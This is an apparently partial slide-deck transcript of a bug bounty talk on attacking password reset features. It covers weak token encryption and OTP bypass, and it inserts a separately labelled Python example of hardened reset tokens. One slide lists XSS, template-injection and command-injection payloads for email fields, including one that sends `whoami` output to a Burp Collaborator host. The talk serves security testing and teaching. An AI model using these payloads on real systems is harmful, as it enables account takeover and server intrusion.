
Abusing Password Reset Functionality

Tuhin Bose
September 18, 2021



Transcript

  1. root@kali:~# whoami

     Bug Bounty Hunter. CISO at Damn Secure Pentesting Hub. Crowdsource Security Researcher at Detectify. B. Tech in Cyber Security and Digital Forensics. Ethically hacked and secured Google, National Cyber Security Center (Netherlands), NCIIPC, ISC2 (Top 25), Unilever (Top 25), Mastercard, Dell, Pinterest, SpaceX (Top 3) and many other programs.
  2. AGENDA

     What is Password Reset? Flows of Password Reset. Common Password Reset Implementation in Web Application. Hacking Password Reset Feature. Conclusion & QnA.
  3. If an application has a login feature, then it should also have a password reset feature.

     To implement a proper user management system, developers must provide a way for users to reset their account password.
  4. Flow of Password Reset

     The user enters their username/email. The server sends a password reset link to the user. The user opens the password reset link and enters a new password. The password is changed.
  5. 4. Weak Encryption

     Sometimes developers use weak encryption algorithms when generating password reset tokens. For example, they may simply encrypt the user's id + a timestamp with a weak algorithm, which makes the token reproducible by anyone who knows those inputs.
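As an added defender-side illustration (not code from the deck): the user-id-plus-timestamp construction the slide warns about next to a reset token drawn from the OS CSPRNG, stored only as a hash, time-limited and single-use. The in-memory store, the 15-minute TTL and the function names are assumptions for the example.

```python
import base64
import hashlib
import secrets
import time
from typing import Optional

TOKEN_TTL_SECONDS = 15 * 60  # assumed lifetime of a reset link

# Constructed in-memory store standing in for the database (assumption):
# sha256(token) -> {"user_id", "expires_at", "used"}
RESET_TOKENS: dict = {}


def weak_token(user_id: int, timestamp: int) -> str:
    """The pattern the slide describes: user id + timestamp, merely encoded.
    Equal inputs always give the same token, so it is reproducible, not secret."""
    return base64.urlsafe_b64encode(f"{user_id}:{timestamp}".encode()).decode()


def issue_reset_token(user_id: int, now: Optional[float] = None) -> str:
    """Hardened: 256 random bits from the OS CSPRNG. Only the SHA-256 of the
    token is stored, so a database leak does not yield usable reset links.
    The plaintext token is returned once, to be placed in the email."""
    now = time.time() if now is None else now
    token = secrets.token_urlsafe(32)
    digest = hashlib.sha256(token.encode()).hexdigest()
    RESET_TOKENS[digest] = {
        "user_id": user_id,
        "expires_at": now + TOKEN_TTL_SECONDS,
        "used": False,
    }
    return token


def redeem_reset_token(token: str, now: Optional[float] = None) -> Optional[int]:
    """Return the user id if the presented token is valid, else None.
    Looking the token up by its hash avoids comparing the secret directly;
    a token is consumed on first use so a leaked link cannot be replayed."""
    now = time.time() if now is None else now
    digest = hashlib.sha256(token.encode()).hexdigest()
    record = RESET_TOKENS.get(digest)
    if record is None or record["used"] or now > record["expires_at"]:
        return None
    record["used"] = True
    return record["user_id"]
```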
  6. 14. If they are sending an OTP for password reset, try 2FA bypass techniques.

     https://twitter.com/tuhin1729_/status/1414813055054086152
  7. 18. Try XSS, SSTI, Command Injection etc. in the email field.

     hello+(<script>alert(1)</script>)@gmail.com
     "<%= 7 * 7 %>"@gmail.com
     hello+(${{7*7}})@gmail.com
     hello@`whoami`.xyz.burpcollaborator.net